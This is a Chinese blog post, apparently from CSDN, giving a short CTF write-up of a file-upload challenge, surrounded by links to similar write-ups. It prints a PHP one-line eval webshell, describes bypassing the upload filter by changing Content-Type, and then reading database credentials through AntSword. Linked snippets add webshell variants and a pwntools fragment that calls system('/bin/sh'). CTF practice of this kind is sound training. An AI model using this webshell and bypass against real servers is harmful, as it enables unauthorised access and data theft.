i春秋练习——第三届“百越杯”福建省高校网络空间安全大赛-web-do you know upload

最新推荐文章于 2024-05-01 20:40:25 发布

wuerror

最新推荐文章于 2024-05-01 20:40:25 发布

阅读量561

点赞数

分类专栏： ctf 文章标签： ctf

本文链接：https://blog.csdn.net/weixin_40871137/article/details/103871519

版权

ctf 专栏收录该内容

28 篇文章 1 订阅

订阅专栏

首先是一个文件上传，比较基础。选择上传111.php,内容是一句话马<?php eval($_POST['cmd']);?>

burpsuit抓包修改Content-Type为image/gif(任一种图片都行),这类漏洞可以搭建一个upload-lab本地练一练。

显示上传成功

接下来使用蚁剑连接，连接密码就是之前一句话写的cmd，编码器可以选default，这题没啥关系。

多出来的h.jpg,y5.php是之前尝试的时候传的

然后翻到config.php

回到蚁剑主界面右键单击选择数据操作，新建一个数据库连接，账号密码是之前config.php里的

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

wuerror

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

requests-html库初识 + 无资料解BUG之 I/O error : encoder error，Python爬虫第30例

梦想橡皮擦，专栏100例写作模式先行者，现象级专栏《Python 爬虫 100 例》作者、《滚雪球学 Python 专栏》原创者

09-05

1万+

这篇博客解决了一个BUG，恭喜你发现了 encoding error : input conversion failed due to input error, bytes 0x81 0xE3 0xD3 0xAA

GitLab CI/CD .gitlab-ci.yml 关键词（一）：脚本script，前置脚本before_script，后置脚本after_script

知无涯

04-01

3712

本篇文章详细介绍了极狐GitLabCI/CD中script，，与三个关键词。对于一个作业script内容是必填项（trigger作业除外），这也是script关键词放到第一个来讲解的原因。与这两个关键词与script的内容一致，都是定义作业的脚本，除了执行时机还有一些其他的不同之处。本文也是详细解释。......

参与评论您还未登录，请先登录后发表或查看评论

i春秋 CTF大本营竞赛训练营 200+道题目答案

03-30

i春秋 CTF大本营竞赛训练营 200+道题目答案竞赛包括冬令营白帽黑客专项训练赛之春秋杯等国内比较好的安全知识在线学习平台，把复杂的操作系统、工具和网络环境完整的在网页进行重现，为学习者提供完全贴近实际环境的实验平台

第三届“百越杯”福建省高校网络空间安全大赛Do you know upload？Writeup

驻足

04-21

3844

推一波我的博客 Marsguest’s Blog 第三届“百越杯”福建省高校网络空间安全大赛Do you know upload？Writeup 首先，直接上传一句话木马1.php文件 <?php eval($_POST['cmd']);?> //文件内容发现如图弹窗初步判断是前台直接判断文件类型，这种绕过相对简单，更改传输时文件类型即可再次上传1.php的...

第三届“百越杯”福建省高校网络空间安全大赛------------Do you know upload？

大方子

08-30

716

========================== 个人收获 1.通过修改文件类型绕过上传限制 ========================= 题目：查看源码有一个提示信息上传图片正常，上传其他的文件会出现典型的上传绕过，这里就只需要把文件类型content-type字段改为image/gif（在上传其他文件的时候）然后我们上传普通的php一句...

CTF-"第三届“百越杯”福建省高校网络空间安全大赛":Do you know upload？

路漫漫其修远

08-03

196

分值：100分类型：Web题目名称：Do you know upload？题目内容：https://www.ichunqiu.com/battalion?t=1&r=0 知识点使用BurpSuite绕过上传文件格式校验使用中国菜刀连接一句话???? 操作流程打开页面,是个上传界面.直接上传php一句话,提示文件类型不允许. 上传一句话.jpg,提交时使用Burpsuite...

第三届“百越杯”福建省高校网络空间安全大赛Do you know upload？

Naptmn的博客

11-18

473

打开之后很明显是个文件上传漏洞当然也有可能是我层次太低看不出来还有哈别的可能 f12后也证明了这一点虽然好像和这个include没有什么关系尝试传一句话木马之前做过一个带过滤的一句话木马，那个题忘记了，就想着继续按照上次的传，之后发现好像不太行，就换回了最简单的一句话木马 <?php eval($_POST['a']); ?> 上传后提示不支持此类文件格式，之后开始用bp抓包改类型把里面的Type改为：image/jpeg 上传就成功了或者先把一句话格式改为jpg，抓包时再

信息安全基础；Web安全理论和定义；机密性、完整性和可用性；漏洞；威胁 - Threats；安全控制 - Security Controls；TCP/IP 安全

秋̶᭄ꦿ攻城狮࿆ྂ

07-28

4558

信息安全基础；Web安全理论和定义机密性、完整性和可用性机密性完整性可用性漏洞漏洞级别The Presence of Vulnerabilities威胁 - Threats安全控制 - Security ControlsTCP/IP 安全 Web安全理论和定义机密性、完整性和可用性描述了信息安全的基本目标，是理解信息安全的基础。机密性机密性指信息指在未验证状态下信息不能被用户获取。也就是说，只有被验证过的用户才能获得敏感数据。联想下你的银行卡，你是授权可以访问的，但是，银行的雇员们也可以访问，

西工大网络空间安全日CTF wp

sxswz的博客

04-17

2383

pwn pwn1 拿到题目首先checksec 拖进ida观察，发现有受害者函数观察受害者函数，发现有gets() 再观察左侧函数窗，发现有_system 找到system的地址观察.rodata段，发现有’/bin/sh’字符串写脚本 #080483c0 _system #08048610 /bin/sh from pwn import * io=remote('139.196.175.134',10000) payload=b'a'*16+p32(0)+p32(0x080483c0)+

Java SE 8 Programmer I Study Guide: Exam 1Z0-808

02-02

Title: OCA: Oracle Certified Associate Java SE 8 Programmer I Study Guide: Exam 1Z0-808 Author: Jeanne Boyarsky, Scott Selikoff Length: 432 pages Edition: 1 Language: English Publisher: Sybex ...

第三届“百越杯”福建省高校网络空间安全大赛 Do you know upload？

feng的博客

09-10

665

这是涉及文件上传和蚁剑连数据库的一个题目

i春秋ctf训练营writeup-Do you know upload？

bbszhenshuai的博客

05-22

398

main 打开看到是一个图片上传首先假设它妹有拓展名过滤，直接传个一句话。假设不成立。把一句话的拓展名改为.jpg，打开burpsuit，在发的时候再把jpg改成php 会返回给你它的路径。访问一下看看是不是就是那个路径发现确实如此。用蚁剑连接，可以看到html目录下有一个config.php 内容如下所以直接去连数据库然后一顿找，就找到了flag ...

i春秋-第三届“百越杯”福建省高校网络空间安全大赛

qq_44858189的博客

07-29

2294

i春秋-第三届“百越杯”福建省高校网络空间安全大赛文件上传利用菜刀连接数据库记录一下i春秋里的一道web题，题目类型是文件上传漏洞传送门：https://www.ichunqiu.com/battalion?t=1&r=61025 主要就两个知识点，很基础，适合新手阅读，大佬勿喷哈文件上传来到上传点先上传一个正常的.jpg文件(图片中写入一句话木马) <?php eval($_POST['a']) ;?> 然后打开burp suite抓包，把后缀名jpg修改成php

第三届“百越杯”福建省高校网络空间安全大赛_Do you know upload？

a173262565的博客

04-09

264

题目在i春秋的ctf训练营既然是上传，那就直接抓包二话不说上来先给个00截断传个一句话助助兴直接就成功了.... 赶紧操起菜刀去连接进去之后发现ctf.sql是个空文件，那么flag应该在数据库中查看config.php可以直接看到数据库账号密码直接用菜刀连接，就能拿到flag了(一开始点开flag列并没有回显，后来自己修改了查询语句后才有...

第三届“百越杯”福建省高校网络空间安全大赛

andiao1218的博客

03-21

662

Upload：选择jpg后缀的一句话木马，burp开启抓包，点击Submit上传把jpg改为php，发包，在返回包里看到马的地址用菜刀连接这里有个ctf.sql，但是里面没有东西，flag可能在数据库里，打开config.php 得到数据库名称ctf，账号ctf，密码ctfctfctf 上大马登陆mysql数据库选择...

第三届“百越杯”福建省高校网络空间安全大赛writeup--Do you know upload？

weixin_30586257的博客

07-14

231

一打开网址，可以看出应该是文件上传漏洞，查看源码，也有可能是文件包含上传个图片，成功，然后上传一句话木马通过bp进行上传绕过，开始菜刀连接http://e00b6eca3c9c4e14a31cf6ce409fab9006d33f25aeda472e.game.ichunqiu.com/upload/2.php，密码为a 发现有ctf.sql，but打不开，所以用...

福州大学计算机学院董晨老师,福州大学代表队高分斩获第三届福建省高校网络空间安全大赛冠军...

weixin_42594419的博客

07-02

1125

新闻中心讯/10月27日，由福建省教育厅、福建省网络与信息安全协调小组办公室主办的“百越杯”第三届福建省高校网络空间安全大赛在福州圆满落幕，福州大学三支代表队揽获本届大赛的冠军暨特等奖、二等奖和三等奖。本次省赛福州大学派出的代表队由数学与计算机科学学院学生组成，最终三支参赛队均获佳绩。其中，福州大学ROIS_A队(指导老师：何萧玲，参赛者：李剑涛(2015级信息安全专业本科生)，王树民(2015级...

CTF-BUUCTF-MISC-USB

weixin_43880435的博客

05-09

3460

#CTF-BUUCTF-MISC-USB 复现学习一下这道题的解题过程，看的WP 参考：https://www.cnblogs.com/wrnan/p/12192080.html#usb 参考：https://www.freebuf.com/column/199854.html 这里的文件头标志应该为74，不然解压不出后面的文件，修改7A 为74 保存解压得到 Stegsolve.jar 得到：ci{v3erf_0tygidv2_fc0} 打开key.ftm,根据文件名的提示，根据文件的提示，搜索

[SWPUCTF 2021 新生赛] Do_you_know_http

m0_74759151的博客

05-01

415

[SWPUCTF 2021 新生赛] Do_you_know_http

npm WARN using --force I sure hope you know what you are doing. npm WARN using --force I sure hope you know what you are doing.